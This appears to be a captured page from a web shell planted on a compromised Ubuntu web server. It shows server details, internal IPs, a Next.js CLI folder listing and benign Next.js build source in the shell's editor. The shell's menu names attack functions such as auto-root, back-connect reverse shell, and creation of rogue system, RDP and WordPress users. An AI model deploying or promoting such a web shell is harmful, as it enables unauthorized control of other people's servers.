Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
next /
dist /
cli /
[ HOME SHELL ]
Name
Size
Permission
Action
next-build-args.d.ts
98
B
-rw-rw-r--
next-build-args.js
617
B
-rw-rw-r--
next-build-args.js.map
312
B
-rw-rw-r--
next-build.d.ts
166
B
-rw-rw-r--
next-build.js
4.24
KB
-rw-rw-r--
next-build.js.map
1.52
KB
-rw-rw-r--
next-dev-args.d.ts
98
B
-rw-rw-r--
next-dev-args.js
847
B
-rw-rw-r--
next-dev-args.js.map
391
B
-rw-rw-r--
next-dev.d.ts
162
B
-rw-rw-r--
next-dev.js
12.55
KB
-rw-rw-r--
next-dev.js.map
6.99
KB
-rw-rw-r--
next-export-args.d.ts
98
B
-rw-rw-r--
next-export-args.js
463
B
-rw-rw-r--
next-export-args.js.map
262
B
-rw-rw-r--
next-export.d.ts
132
B
-rw-rw-r--
next-export.js
3.91
KB
-rw-rw-r--
next-export.js.map
1.5
KB
-rw-rw-r--
next-info-args.d.ts
134
B
-rw-rw-r--
next-info-args.js
397
B
-rw-rw-r--
next-info-args.js.map
213
B
-rw-rw-r--
next-info.d.ts
447
B
-rw-rw-r--
next-info.js
18.91
KB
-rw-rw-r--
next-info.js.map
9.49
KB
-rw-rw-r--
next-lint-args.d.ts
98
B
-rw-rw-r--
next-lint-args.js
1.25
KB
-rw-rw-r--
next-lint-args.js.map
673
B
-rw-rw-r--
next-lint.d.ts
128
B
-rw-rw-r--
next-lint.js
8.1
KB
-rw-rw-r--
next-lint.js.map
3.92
KB
-rw-rw-r--
next-start-args.d.ts
98
B
-rw-rw-r--
next-start-args.js
512
B
-rw-rw-r--
next-start-args.js.map
278
B
-rw-rw-r--
next-start.d.ts
166
B
-rw-rw-r--
next-start.js
2.26
KB
-rw-rw-r--
next-start.js.map
1.17
KB
-rw-rw-r--
next-telemetry-args.d.ts
98
B
-rw-rw-r--
next-telemetry-args.js
399
B
-rw-rw-r--
next-telemetry-args.js.map
216
B
-rw-rw-r--
next-telemetry.d.ts
138
B
-rw-rw-r--
next-telemetry.js
2.32
KB
-rw-rw-r--
next-telemetry.js.map
1.41
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : next-build.js
#!/usr/bin/env node "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); Object.defineProperty(exports, "nextBuild", { enumerable: true, get: function() { return nextBuild; } }); require("../server/lib/cpu-profile"); const _fs = require("fs"); const _log = /*#__PURE__*/ _interop_require_wildcard(require("../build/output/log")); const _build = /*#__PURE__*/ _interop_require_default(require("../build")); const _utils = require("../server/lib/utils"); const _iserror = /*#__PURE__*/ _interop_require_default(require("../lib/is-error")); const _getprojectdir = require("../lib/get-project-dir"); function _interop_require_default(obj) { return obj && obj.__esModule ? obj : { default: obj }; } function _getRequireWildcardCache(nodeInterop) { if (typeof WeakMap !== "function") return null; var cacheBabelInterop = new WeakMap(); var cacheNodeInterop = new WeakMap(); return (_getRequireWildcardCache = function(nodeInterop) { return nodeInterop ? cacheNodeInterop : cacheBabelInterop; })(nodeInterop); } function _interop_require_wildcard(obj, nodeInterop) { if (!nodeInterop && obj && obj.__esModule) { return obj; } if (obj === null || typeof obj !== "object" && typeof obj !== "function") { return { default: obj }; } var cache = _getRequireWildcardCache(nodeInterop); if (cache && cache.has(obj)) { return cache.get(obj); } var newObj = {}; var hasPropertyDescriptor = Object.defineProperty && Object.getOwnPropertyDescriptor; for(var key in obj){ if (key !== "default" && Object.prototype.hasOwnProperty.call(obj, key)) { var desc = hasPropertyDescriptor ? Object.getOwnPropertyDescriptor(obj, key) : null; if (desc && (desc.get || desc.set)) { Object.defineProperty(newObj, key, desc); } else { newObj[key] = obj[key]; } } } newObj.default = obj; if (cache) { cache.set(obj, newObj); } return newObj; } const nextBuild = (args)=>{ if (args["--help"]) { (0, _utils.printAndExit)(` Description Compiles the application for production deployment Usage $ next build <dir> <dir> represents the directory of the Next.js application. If no directory is provided, the current directory will be used. Options --profile Can be used to enable React Production Profiling --no-lint Disable linting --no-mangling Disable mangling --experimental-app-only Only build 'app' routes --experimental-turbo Enable experimental turbo mode --help, -h Displays this message `, 0); } if (args["--profile"]) { _log.warn("Profiling is enabled. Note: This may affect performance"); } if (args["--no-lint"]) { _log.warn("Linting is disabled"); } if (args["--no-mangling"]) { _log.warn("Mangling is disabled. Note: This may affect performance and should only be used for debugging purposes"); } const dir = (0, _getprojectdir.getProjectDir)(args._[0]); // Check if the provided directory exists if (!(0, _fs.existsSync)(dir)) { (0, _utils.printAndExit)(`> No such directory exists as the project root: ${dir}`); } if (args["--experimental-turbo"]) { process.env.TURBOPACK = "1"; } return (0, _build.default)(dir, args["--profile"], args["--debug"] || process.env.NEXT_DEBUG_BUILD, !args["--no-lint"], args["--no-mangling"], args["--experimental-app-only"], !!process.env.TURBOPACK, args["--experimental-turbo-root"], args["--build-mode"] || "default").catch((err)=>{ console.error(""); if ((0, _iserror.default)(err) && (err.code === "INVALID_RESOLVE_ALIAS" || err.code === "WEBPACK_ERRORS" || err.code === "BUILD_OPTIMIZATION_FAILED" || err.code === "NEXT_EXPORT_ERROR" || err.code === "NEXT_STATIC_GEN_BAILOUT" || err.code === "EDGE_RUNTIME_UNSUPPORTED_API")) { (0, _utils.printAndExit)(`> ${err.message}`); } else { console.error("> Build error occurred"); (0, _utils.printAndExit)(err); } }); }; //# sourceMappingURL=next-build.js.map
Close